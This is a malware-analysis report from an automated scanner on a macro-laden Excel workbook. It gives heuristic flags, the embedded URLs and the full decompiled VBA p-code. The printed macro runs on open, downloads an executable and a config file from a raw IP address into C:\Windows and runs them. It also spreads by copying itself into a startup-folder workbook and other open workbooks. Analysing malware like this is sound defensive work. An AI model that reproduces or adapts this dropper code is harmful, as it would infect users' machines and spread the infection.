MALICIOUS
224
Risk Score
Heuristics 7
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
VBA project contains no executable statements info 1 related finding OLE_VBA_MACROSDocument contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://45.78.21.150/boost/boosting.exe� In document text (OLE body)
- http://45.78.21.150/boost/config.txt�In document text (OLE body)
- http://45.78.21.150/boost/booIn macro / runtime command snippet
- http://45.78.21.150/boost/boosting.exeIn document text (OLE body)
- http://45.78.21.150/boost/config.txtIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12356 bytes |
SHA-256: 67cf82023f4f1a3d6481e4d6c7cbb7c31bdb655cae2093d6801f530bf2352c22 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/354cda915e9848ffbf1f3d929637e5ea.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8233 bytes
' Line #0:
' FuncDefn (Private Declare Function URLDownloadToFile Lib "urlmon" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long)
' Line #1:
' FuncDefn (Private Declare Function ShellExecute Lib "shell32.dll" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long)
' Line #2:
' Dim (Private)
' VarDefn (WithEvents) app (As Application) 0x0000
' Line #3:
' Line #4:
' FuncDefn (Sub boosting())
' Line #5:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #6:
' OnError (Resume Next)
' Line #7:
' SetStmt
' LitStr 0x000D "Win32_Process"
' LitStr 0x000C "winmgmts:\\."
' ArgsLd GetObject 0x0001
' ArgsMemLd instancesof 0x0001
' Set pro
' Line #8:
' LitDI2 0x0000
' St boo
' Line #9:
' StartForVariable
' Ld ps
' EndForVariable
' Ld pro
' ForEach
' Line #10:
' Ld ps
' MemLd Name
' LitStr 0x000C "boosting.exe"
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' St boo
' EndIf
' Line #11:
' StartForVariable
' Next
' Line #12:
' Ld boo
' LitDI2 0x0001
' Eq
' IfBlock
' Line #13:
' ExitSub
' Line #14:
' ElseBlock
' Line #15:
' LitStr 0x0015 "ping www.163.com -n 1"
' LitDI2 0x0000
' LitVarSpecial (True)
' LitStr 0x000D "Wscript.shell"
' ArgsLd CreateObject 0x0001
' ArgsMemLd Run 0x0003
' St oExec
' Line #16:
' Ld oExec
' LitDI2 0x0000
' Eq
' IfBlock
' Line #17:
' LitDI2 0x0000
' LitStr 0x0026 "http://45.78.21.150/boost/boosting.exe"
' LitStr 0x0017 "C:\Windows\boosting.exe"
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall URLDownloadToFile 0x0005
' Line #18:
' LitDI2 0x0000
' LitStr 0x0024 "http://45.78.21.150/boost/config.txt"
' LitStr 0x0015 "C:\Windows\config.txt"
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall URLDownloadToFile 0x0005
' Line #19:
' EndIfBlock
' Line #20:
' LitDI4 0x0000 0x0000
' Ld vbNullString
' LitStr 0x0017 "C:\Windows\boosting.exe"
' LitStr 0x0015 "C:\Windows\config.txt"
' Ld vbNullString
' LitDI2 0x0000
' ArgsCall ShellExecute 0x0006
' Line #21:
' EndIfBlock
' Line #22:
' EndSub
' Line #23:
' FuncDefn (Sub runtimer())
' Line #24:
' Ld Now
' LitStr 0x0008 "00:00:03"
' ArgsLd TimeValue 0x0001
' Add
' LitStr 0x0011 "thisworkbook.p2dd"
' Ld Application
' ArgsMemCall OnTime 0x0002
' Line #25:
' EndSub
' Line #26:
' Line #27:
' FuncDefn (Private Sub p2dd())
' Line #28:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #29:
' OnError (Resume Next)
' Line #30:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #31:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Eq
' IfBlock
' Line #32:
' Ld Err
' ArgsMemCall Clear 0x0000
' Line #33:
' LitStr 0x0010 "%(qtmstv){ENTER}"
' Ld Application
' ArgsMemCall SendKeys 0x0001
' Line #34:
' ArgsCall DoEvents 0x0000
' Line #35:
' EndIfBlock
' Line #36:
' Ld ActiveWorkbook
' MemLd FileFormat
' LitDI2 0x0034
' Eq
' Ld ActiveWorkbook
' MemLd FileFormat
' LitDI2 0x0038
' Eq
' Or
' IfBlock
' Line #37:
' LitStr 0x0006 "update"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x000A
' LitDI2 0x0001
' LitVarSpecial (False)
' LitVarSpecial (False)
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Find 0x0007
' LitVarSpecial (True)
' Eq
' LitStr 0x000B "OfficeCheck"
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x000A
' LitDI2 0x0001
' LitVarSpecial (False)
' LitVarSpecial (False)
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Find 0x0007
' LitVarSpecial (True)
' Eq
' Or
' IfBlock
' Line #38:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' St k
' Line #39:
' LitDI2 0x0001
' Ld k
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #40:
' EndIfBlock
' Line #41:
' Dim
' VarDefn WBstr
' VarDefn Wb (As Workbook)
' Line #42:
' StartWithExpr
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #43:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0064
' For
' QuoteRem 0x0019 0x000D ".CountOfLines"
' Line #44:
' Ld WBstr
' Ld i
' LitDI2 0x0001
' ArgsMemLdWith Lines 0x0002
' Concat
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Concat
' St WBstr
' Line #45:
' StartForVariable
' Next
' Line #46:
' EndWith
' Line #47:
' Line #48:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Eq
' IfBlock
' Line #49:
' LitDI2 0x0001
' Ld WBstr
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #50:
' LitDI2 0x0096
' LitStr 0x0013 "Sub Workbook_Open()"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #51:
' LitDI2 0x0097
' LitStr 0x0008 "Call d2p"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #52:
' LitDI2 0x0098
' LitStr 0x000D "Call boosting"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #53:
' LitDI2 0x0099
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #54:
' EndIfBlock
' Line #55:
' EndIfBlock
' Line #56:
' EndSub
' Line #57:
' Line #58:
' FuncDefn (Private Sub d2p())
' Line #59:
' Dim
' VarDefn pth (As String)
' Line #60:
' Dim
' VarDefn WBstr
' VarDefn Wb (As Workbook)
' Line #61:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #62:
' OnError (Resume Next)
' Line #63:
' Ld Application
' MemLd StartupPath
' LitStr 0x000D "\boosting.xls"
' Concat
' St pth1
' Line #64:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #65:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Eq
' IfBlock
' Line #66:
' Ld Err
' ArgsMemCall Clear 0x0000
' Line #67:
' LitStr 0x0010 "%(qtmstv){ENTER}"
' Ld Application
' ArgsMemCall SendKeys 0x0001
' Line #68:
' ArgsCall DoEvents 0x0000
' Line #69:
' EndIfBlock
' Line #70:
' Ld pth1
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Eq
' IfBlock
' Line #71:
' Debug
' PrintObj
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' PrintItemNL
' Line #72:
' Ld Err
' MemLd Number
' LitDI2 0x03EC
' Ne
' IfBlock
' Line #73:
' Ld pth1
' ParamNamed Filename
' LitDI2 0x0012
' ParamNamed FileFormat
' Ld Workbooks
' MemLd Add
' ArgsMemCall SaveAs 0x0002
' Line #74:
' QuoteRem 0x0000 0x0004 "Else"
' Line #75:
' QuoteRem 0x0004 0x000F "Workbooks.Close"
' Line #76:
' EndIfBlock
' Line #77:
' SetStmt
' Ld pth1
' Ld Workbooks
' ArgsMemLd Open 0x0001
' Set Wb
' Line #78:
' StartWithExpr
' LitStr 0x000C "ThisWorkbook"
' Ld ThisWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #79:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0064
' For
' QuoteRem 0x0019 0x0011 ".CountOfLines 100"
' Line #80:
' Ld WBstr
' Ld i
' LitDI2 0x0001
' ArgsMemLdWith Lines 0x0002
' Concat
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Concat
' St WBstr
' Line #81:
' StartForVariable
' Next
' Line #82:
' EndWith
' Line #83:
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Eq
' Ld ActiveWorkbook
' MemLd Name
' LitStr 0x000C "boosting.xls"
' Eq
' And
' IfBlock
' Line #84:
' LitDI2 0x0001
' Ld WBstr
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #85:
' LitDI2 0x0096
' LitStr 0x0013 "Sub Workbook_Open()"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #86:
' LitDI2 0x0097
' LitStr 0x0015 "Set App = Application"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #87:
' LitDI2 0x0098
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #88:
' LitDI2 0x0099
' LitStr 0x0032 "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #89:
' LitDI2 0x009A
' LitStr 0x000D "Call runtimer"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #90:
' LitDI2 0x009B
' LitStr 0x000D "Call boosting"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #91:
' LitDI2 0x009C
' LitStr 0x0007 "End Sub"
' LitStr 0x000C "ThisWorkbook"
' Ld ActiveWorkbook
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #92:
' EndIfBlock
' Line #93:
' LitVarSpecial (True)
' Ld ActiveWorkbook
' MemSt IsAddin
' Line #94:
' Ld Wb
' ArgsMemCall Save 0x0000
' Line #95:
' Ld Wb
' ArgsMemCall Close 0x0000
' Line #96:
' EndIfBlock
' Line #97:
' Ld pth1
' Paren
' Ld Workbooks
' ArgsMemCall Open 0x0001
' Line #98:
' EndSub
' Line #99:
' Line #100:
' Line #101:
' FuncDefn (Sub Workbook_Open())
' Line #102:
' ArgsCall (Call) d2p 0x0000
' Line #103:
' ArgsCall (Call) boosting 0x0000
' Line #104:
' EndSub
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.